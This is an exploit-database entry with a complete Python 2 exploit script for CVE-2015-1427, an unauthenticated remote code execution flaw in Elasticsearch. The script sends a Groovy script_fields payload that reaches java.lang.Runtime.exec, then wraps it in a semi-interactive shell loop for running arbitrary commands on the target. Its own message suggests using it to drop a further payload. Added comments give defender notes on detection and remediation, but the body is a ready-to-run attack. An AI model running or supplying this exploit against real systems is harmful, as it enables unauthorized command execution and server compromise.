zdt | Darren Martyn | 1337DAY-ID-23379
History: Mar 12, 2015 - 12:00 a.m.

ElasticSearch Unauthenticated Remote Code Execution Exploit

2015-03-12 00:00:00
Darren Martyn
0day.today
69

EPSS: 0.867 (High)

Percentile: 98.3%

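Exploit for the Linux platform, in the category of remote exploits. The script below targets CVE-2015-1427 by sending an unauthenticated scripted-search request to the Elasticsearch REST port (9200). Nodes should run a release the vendor lists as fixed for this CVE or have dynamic Groovy scripting disabled, and port 9200 should not be reachable from untrusted networks.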

#!/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150309.1
# Licence: WTFPL - wtfpl.net
import json
import requests
import sys
import readline
# Configure line editing for the interactive prompt used further down:
# tab completion plus vi-style key bindings.
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode vi')
# Tool version string; interpolated into the banner text.
__version__ = "20150309.1"
 
def banner():
    """Print the ANSI-coloured start-up banner, including the tool version.

    The last line of the banner names the issue this script targets
    (CVE-2015-1427).
    """
    # NOTE(review): the block-art below appears mis-decoded in this copy of
    # the file; it is runtime text, so it is left exactly as found.
    print """\x1b[1;32m
β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ  β–ˆβ–ˆβ–“    β–„β–„β–„        β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–„β–„β–„β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–“ β–ˆβ–ˆβ–“ β–„β–ˆβ–ˆβ–ˆβ–ˆβ–„    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ  β–ˆβ–ˆβ–‘ β–ˆβ–ˆ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ  β–ˆβ–ˆβ–“     β–ˆβ–ˆβ–“   
β–“β–ˆ   β–€ β–“β–ˆβ–ˆβ–’   β–’β–ˆβ–ˆβ–ˆβ–ˆβ–„    β–’β–ˆβ–ˆ    β–’ β–“  β–ˆβ–ˆβ–’ β–“β–’β–“β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–€ β–€β–ˆ  β–’β–ˆβ–ˆ    β–’ β–“β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’β–“β–ˆ   β–€ β–“β–ˆβ–ˆβ–’    β–“β–ˆβ–ˆβ–’   
β–’β–ˆβ–ˆβ–ˆ   β–’β–ˆβ–ˆβ–‘   β–’β–ˆβ–ˆ  β–€β–ˆβ–„  β–‘ β–“β–ˆβ–ˆβ–„   β–’ β–“β–ˆβ–ˆβ–‘ β–’β–‘β–’β–ˆβ–ˆβ–’β–’β–“β–ˆ    β–„ β–‘ β–“β–ˆβ–ˆβ–„   β–’β–ˆβ–ˆβ–€β–€β–ˆβ–ˆβ–‘β–’β–ˆβ–ˆβ–ˆ   β–’β–ˆβ–ˆβ–‘    β–’β–ˆβ–ˆβ–‘   
β–’β–“β–ˆ  β–„ β–’β–ˆβ–ˆβ–‘   β–‘β–ˆβ–ˆβ–„β–„β–„β–„β–ˆβ–ˆ   β–’   β–ˆβ–ˆβ–’β–‘ β–“β–ˆβ–ˆβ–“ β–‘ β–‘β–ˆβ–ˆβ–‘β–’β–“β–“β–„ β–„β–ˆβ–ˆβ–’  β–’   β–ˆβ–ˆβ–’β–‘β–“β–ˆ β–‘β–ˆβ–ˆ β–’β–“β–ˆ  β–„ β–’β–ˆβ–ˆβ–‘    β–’β–ˆβ–ˆβ–‘   
β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–’β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–’β–“β–ˆ   β–“β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–’β–’  β–’β–ˆβ–ˆβ–’ β–‘ β–‘β–ˆβ–ˆβ–‘β–’ β–“β–ˆβ–ˆβ–ˆβ–€ β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–’β–’β–‘β–“β–ˆβ–’β–‘β–ˆβ–ˆβ–“β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–’β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–’β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–’
β–‘β–‘ β–’β–‘ β–‘β–‘ β–’β–‘β–“  β–‘β–’β–’   β–“β–’β–ˆβ–‘β–’ β–’β–“β–’ β–’ β–‘  β–’ β–‘β–‘   β–‘β–“  β–‘ β–‘β–’ β–’  β–‘β–’ β–’β–“β–’ β–’ β–‘ β–’ β–‘β–‘β–’β–‘β–’β–‘β–‘ β–’β–‘ β–‘β–‘ β–’β–‘β–“  β–‘β–‘ β–’β–‘β–“  β–‘
 β–‘ β–‘  β–‘β–‘ β–‘ β–’  β–‘ β–’   β–’β–’ β–‘β–‘ β–‘β–’  β–‘ β–‘    β–‘     β–’ β–‘  β–‘  β–’   β–‘ β–‘β–’  β–‘ β–‘ β–’ β–‘β–’β–‘ β–‘ β–‘ β–‘  β–‘β–‘ β–‘ β–’  β–‘β–‘ β–‘ β–’  β–‘
   β–‘     β–‘ β–‘    β–‘   β–’   β–‘  β–‘  β–‘    β–‘       β–’ β–‘β–‘        β–‘  β–‘  β–‘   β–‘  β–‘β–‘ β–‘   β–‘     β–‘ β–‘     β–‘ β–‘  
   β–‘  β–‘    β–‘  β–‘     β–‘  β–‘      β–‘            β–‘  β–‘ β–‘            β–‘   β–‘  β–‘  β–‘   β–‘  β–‘    β–‘  β–‘    β–‘  β–‘
                                              β–‘                                               
 Exploit for ElasticSearch , CVE-2015-1427   Version: %s\x1b[0m""" %(__version__)
 
def execute_command(target, command):
    """Send one scripted-search request to the target and print the result.

    This is the request the banner attributes to CVE-2015-1427: a search
    body whose script field reaches java.lang.Runtime through
    Math.class.forName rather than naming the class directly, then calls
    exec() on the supplied command. The value of that script field is read
    back from the first hit of the response and printed.

    Defender notes:
      * The request is a plain-HTTP POST to port 9200 with no credentials,
        so it only works where the REST port is reachable by the client;
        keep that port off untrusted networks.
      * A `_search` body containing `script_fields` together with
        `forName`, `java.lang.Runtime` or `.exec(` is a practical
        indicator to look for in proxy, WAF or packet-capture data.
      * Remediation is to run a release the vendor lists as fixed for this
        CVE, or to disable dynamic (Groovy) scripting until an upgrade is
        possible.

    Args:
        target: host name or IP address, interpolated into the request URL.
        command: string interpolated into the script body via %-formatting.
    """
    # JSON search body: one hit requested, with a script field named "lupin".
    payload = """{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"}}}""" %(command)
    try:
        # Hard-coded scheme and port: http on 9200, the search endpoint.
        url = "http://%s:9200/_search?pretty" %(target)
        # No authentication headers and no TLS are used for the request.
        r = requests.post(url=url, data=payload)
    except Exception, e:
        # Any exception raised while sending ends the whole program.
        sys.exit("Exception Hit"+str(e))
    values = json.loads(r.text)
    # Only the first hit is read; a response without hits or without the
    # "lupin" field (for example an error reply) raises here and is not
    # handled.
    fuckingjson = values['hits']['hits'][0]['fields']['lupin'][0]
    print fuckingjson.strip()
         
 
def exploit(target):
    """Run a prompt loop that forwards each typed line to execute_command.

    Every line entered results in a separate call to execute_command, i.e.
    a separate HTTP request; the script's own message describes this as
    "semi-interactive". Typing "exit" terminates the program.

    Defender note: on the server side this appears as a series of
    individual `_search` POST requests from one client, one per command,
    rather than a single long-lived connection.

    Args:
        target: host name or IP address passed through to execute_command.
    """
    print "{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something"
    while True:
        # raw_input uses the readline settings configured at module level.
        cmd = raw_input("~$ ")
        if cmd == "exit":
            sys.exit("{!} Shell exiting!")
        else:
            execute_command(target=target, command=cmd)
     
def main(args):
    """Print the banner, check the argument count and start the prompt loop.

    Args:
        args: argv-style list; args[0] is the program name and args[1] the
            target host. Any other length prints a usage line and exits.
    """
    banner()
    # Exactly one positional argument (the target) is accepted.
    if len(args) != 2:
        sys.exit("Use: %s target" %(args[0]))
    exploit(target=args[1])
 
# Script entry point: runs only when executed directly, not when imported.
if __name__ == "__main__":
    main(args=sys.argv)
